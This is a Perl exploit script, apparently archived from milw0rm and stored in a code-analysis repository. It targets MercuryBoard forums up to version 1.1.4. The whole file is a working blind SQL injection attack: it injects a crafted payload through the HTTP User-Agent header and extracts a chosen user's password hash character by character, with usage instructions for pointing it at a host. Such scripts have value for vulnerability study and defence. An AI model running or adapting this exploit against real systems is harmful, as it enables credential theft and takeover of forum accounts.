lilbool/vuln-code-analysis
0
1#!/usr/bin/perl
2
3### MercuryBoard <=1.1.4, MySQL => 4.1 sql injection exploit by RST/GHC
4### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
5### * note: you need first register on forum for get id and login
6### after what logout from forum and run exploit
7### * note2: edit timestamp in sources if exploit not work ;)
8### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
9### (c)oded by 1dt.w0lf
10### RST/GHC - http://rst.void.ru , http://ghc.ru
11### ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
12
13use IO::Socket;
14use Getopt::Std;
15
16getopts('h:f:b:i:l:p:');
17
18$server = $opt_h;
19$path = $opt_f;
20$member_id = $opt_b;
21$hacker_id = $opt_i;
22$hacker_l = $opt_l;
23$prefix = $opt_p || 'mb_' ;
24
25if(!$server||!$path||!$member_id||!$hacker_id||!$hacker_l) { &usage; }
26
27$server =~ s!(http:\/\/)!!;
28
29$request = 'http://';
30$request .= $server;
31$request .= $path;
32
33$s_num = 1;
34$|++;
35$n = 0;
36&head;
37print "\r\n";
38print " [~] SERVER : $server\r\n";
39print " [~] FORUM PATH : $path\r\n";
40print " [~] ID FOR BRUTE : $member_id\r\n";
41print " [~] HACKER ID : $hacker_id\r\n";
42print " [~] HACKER LOGIN : $hacker_l\r\n";
43print " [~] TABLE PREFIX : $prefix\r\n\r\n";
44print " [~] SEARCHING PASSWORD ... [|]";
45
46while(1)
47{
48if(&found(47,58)==0) { &found(96,103); }
49$char = $i;
50if ($char=="0")
51 {
52 if(length($allchar) > 0){
53 print qq{\b\b DONE ]
54
55 -------------------------------------------------------------------
56 USER ID : $member_id
57 HASH : $allchar
58 -------------------------------------------------------------------
59 };
60 }
61 else
62 {
63 print "\b\b FAILED ]";
64 }
65 exit();
66 }
67else
68 {
69 $allchar .= chr($char);
70 }
71$s_num++;
72}
73
74sub found($$)
75 {
76 my $fmin = $_[0];
77 my $fmax = $_[1];
78 if (($fmax-$fmin)<5) { $i=crack($fmin,$fmax); return $i; }
79
80 $r = int($fmax - ($fmax-$fmin)/2);
81 $check = "/**/BETWEEN/**/$r/**/AND/**/$fmax";
82 if ( &check($check) ) { &found($r,$fmax); }
83 else { &found($fmin,$r); }
84 }
85
86sub crack($$)
87 {
88 my $cmin = $_[0];
89 my $cmax = $_[1];
90 $i = $cmin;
91 while ($i<$cmax)
92 {
93 $crcheck = "=$i";
94 if ( &check($crcheck) ) { return $i; }
95 $i++;
96 }
97 $i = 0;
98 return $i;
99 }
100
101sub check($)
102 {
103 $n++;
104 status();
105 $ccheck = $_[0];
106
107 $user_agent2 = "666',''),($hacker_id, 'board', 0, (SELECT/**/if((ascii(substring((SELECT/**/user_password/**/FROM/**/${prefix}users/**/WHERE/**/user_id=$member_id),$s_num,1)))$ccheck,1119336207,0)), '666.666.666.666', '666', '666')/*";
108
109 $sock2 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$server", PeerPort => "80");
110 printf $sock2 ("GET %s?a=active HTTP/1.0\nHost: %s\nUser-Agent: %s\nAccept: */*\nConnection: close\n\n",
111 $request,$server,$user_agent2);
112
113 while(<$sock2>)
114 {
115 #print $_;
116 if (/w=$hacker_id"\>$hacker_l/) { return 1; }
117 }
118
119 return 0;
120 }
121
122sub status()
123{
124 $status = $n % 5;
125 if($status==0){ print "\b\b/]"; }
126 if($status==1){ print "\b\b-]"; }
127 if($status==2){ print "\b\b\\]"; }
128 if($status==3){ print "\b\b|]"; }
129}
130
131sub usage()
132 {
133 &head;
134 print q(
135 USAGE
136 r57mercury.pl [OPTIONS]
137
138 OPTIONS
139 -h [host] ~ host where mercury board installed
140 -f [/folder/] ~ folder where mercury board installed
141 -b [user_id] ~ user id for bruteforce
142 -i [id] ~ hacker id (hacker must be register on forum)
143 -l [login] ~ hacker login on forum
144 -p [prefix] ~ database tables prefix (optional)
145 default is "mb"
146 E.G.
147 r57mercury.pl -h www.blah.com -f /mercuryboard/ -b 2 -i 3 -l lamer
148 -------------------------------------------------------------------
149 (c)oded by 1dt.w0lf
150 RST/GHC , http://rst.void.ru , http://ghc.ru
151 );
152 exit();
153 }
154sub head()
155 {
156 print q(
157 -------------------------------------------------------------------
158 MercuryBoard <=1.1.4, MySQL => 4.1 sql injection exploit by RST/GHC
159 -------------------------------------------------------------------
160 );
161 }
162
163# milw0rm.com [2005-06-21]